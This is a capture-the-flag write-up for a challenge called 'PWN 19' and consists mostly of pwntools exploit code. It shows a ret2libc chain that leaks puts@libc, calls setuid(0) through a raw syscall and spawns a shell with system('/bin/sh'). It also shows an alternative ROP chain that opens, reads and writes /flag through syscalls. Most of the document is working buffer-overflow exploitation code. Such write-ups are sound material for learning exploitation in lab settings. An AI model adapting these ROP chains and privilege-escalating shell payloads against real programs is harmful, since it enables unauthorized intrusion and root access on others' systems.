PWN 19
Leaking a libc address through puts@plt, then calling setuid(0) via a raw syscall and system("/bin/sh") to get the flag
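# --- Stage 1: leak puts@libc via puts@plt, then return into challenge() for a second overflow ---
cyclic1 = b"\x90"*136  # padding up to the saved return address (offset found beforehand; re-verify with cyclic_find if unsure)

# Gadgets from the binary. find_gadget matches on an instruction *prefix*, so a
# "pop rdx" hit may carry extra pops before its ret; inspect the chosen gadget's
# full instruction list before relying on a single pop.
pop_rax = rop.find_gadget(["pop rax"])[0]
pop_rdi = rop.find_gadget(["pop rdi"])[0]
pop_rsi = rop.find_gadget(["pop rsi", "ret"])[0]
pop_rdx = rop.find_gadget(["pop rdx"])[0]
syscall = rop.find_gadget(["syscall"])[0]
ret = rop.find_gadget(["ret"])[0]

puts_plt = e.plt.puts
main_plt = e.symbols['challenge']   # re-enter the vulnerable function so we can overflow a second time
puts_got = e.got.puts
symbolsPuts = e.symbols['puts']     # not used below; kept in case a later part of the script relies on it

# puts(puts@got) prints the resolved address of puts in libc, then control returns to challenge().
payload = flat([
    cyclic1,
    p64(pop_rdi),
    p64(puts_got),
    p64(puts_plt),
    p64(main_plt),
])
p.send(payload)

marker = b'Leaving!\n'
p.recvuntil(marker)
# A userland x86-64 pointer has 6 significant bytes. recvn(6) blocks until all six have
# arrived, whereas recv(6) may return a short read and silently corrupt the leak.
# (Assumes the low byte of puts@libc is non-zero; otherwise puts() would truncate it.)
leaked_data = p.recvn(6)
leaked_address = u64(leaked_data.ljust(8, b'\x00'))
libc.address = leaked_address - libc.symbols['puts']
# The libc base is always page-aligned; a misaligned result means the wrong libc build
# was loaded or the leak was mis-parsed. Fail early instead of sending a bogus chain.
if libc.address & 0xfff:
    raise RuntimeError(f"libc base {hex(libc.address)} is not page-aligned: wrong libc or bad leak")
print(f"Leaked address: {hex(libc.address)}")

system = libc.symbols['system']
binsh = next(libc.search(b"/bin/sh"))

# --- Stage 2: setuid(0) through a raw syscall, then system("/bin/sh") ---
SYS_SETUID = 0x69  # 105 on x86-64; only effective if the target runs with a privileged euid/saved uid
payload = flat([
    p64(ret),
    b"\x90"*128,        # 8 + 128 = 136 bytes of padding, same offset as stage 1
    p64(ret),           # extra ret at the return slot, presumably to keep the stack 16-byte aligned
    p64(pop_rax),
    p64(SYS_SETUID),
    p64(pop_rdi),
    p64(0x0),           # setuid(0)
    p64(syscall),
    p64(ret),           # alignment again before entering libc's system()
    p64(pop_rdi),
    p64(binsh),
    p64(system),
])
p.send(payload)
p.interactive()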
Alternative without libc: chaining the open, read and write syscalls to print the flag
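# --- Alternative: no libc needed. open("/flag"), read() it onto the stack, write() it to stdout ---
# The challenge prints a stack address. This parsing assumes it arrives as "0x" plus
# 12 hex digits followed by "." and "\n" (16 bytes in total); recvn(16) waits for all
# of them, whereas read()/recv() may return fewer and break int() below.
leak_win = p.recvn(16)
leak_win = leak_win.strip(b"\n")
leak_win = leak_win.strip(b".")
address_int = int(leak_win, 16)
# Distance from the leaked value to where the "/flag" string lands at the tail of this
# payload. Tuned for this binary's stack layout; re-check in gdb if the chain breaks.
address_int += 0x120 + 0x10

# Gadgets from the binary (prefix match: verify a "pop rdx" hit is really "pop rdx; ret").
pop_rax = rop.find_gadget(["pop rax"])[0]
pop_rdi = rop.find_gadget(["pop rdi"])[0]
pop_rsi = rop.find_gadget(["pop rsi", "ret"])[0]
pop_rdx = rop.find_gadget(["pop rdx"])[0]
syscall = rop.find_gadget(["syscall"])[0]

# x86-64 syscall numbers and arguments used by the chain.
SYS_READ = 0x0
SYS_WRITE = 0x1
SYS_OPEN = 0x2
O_RDONLY = 0x0
STDOUT_FD = 0x1
FLAG_FD = 0x3        # assumes only fds 0-2 are open in the target, so open() returns 3
FLAG_BUF_LEN = 0x50

payload = flat([
    cyclic1,         # same 136-byte padding as the libc-leak variant
    # open("/flag", O_RDONLY, 0)
    p64(pop_rax),
    p64(SYS_OPEN),
    p64(pop_rdi),
    p64(address_int),
    p64(pop_rsi),
    p64(O_RDONLY),
    p64(pop_rdx),
    p64(0x0),
    p64(syscall),
    # read(3, buf, 0x50) -- the "/flag" location doubles as the read buffer once open() is done
    p64(pop_rax),
    p64(SYS_READ),
    p64(pop_rdi),
    p64(FLAG_FD),
    p64(pop_rdx),
    p64(FLAG_BUF_LEN),
    p64(pop_rsi),
    p64(address_int),
    p64(syscall),
    # write(1, buf, 0x50)
    p64(pop_rax),
    p64(SYS_WRITE),
    p64(pop_rdi),
    p64(STDOUT_FD),
    p64(pop_rdx),
    p64(FLAG_BUF_LEN),
    p64(pop_rsi),
    p64(address_int),
    p64(syscall),
    # After the write, the chain falls into this string as its next return address and
    # crashes; that is harmless once the flag is already on stdout.
    b"/flag\x00\x00\x00",
])
p.send(payload)
p.interactive()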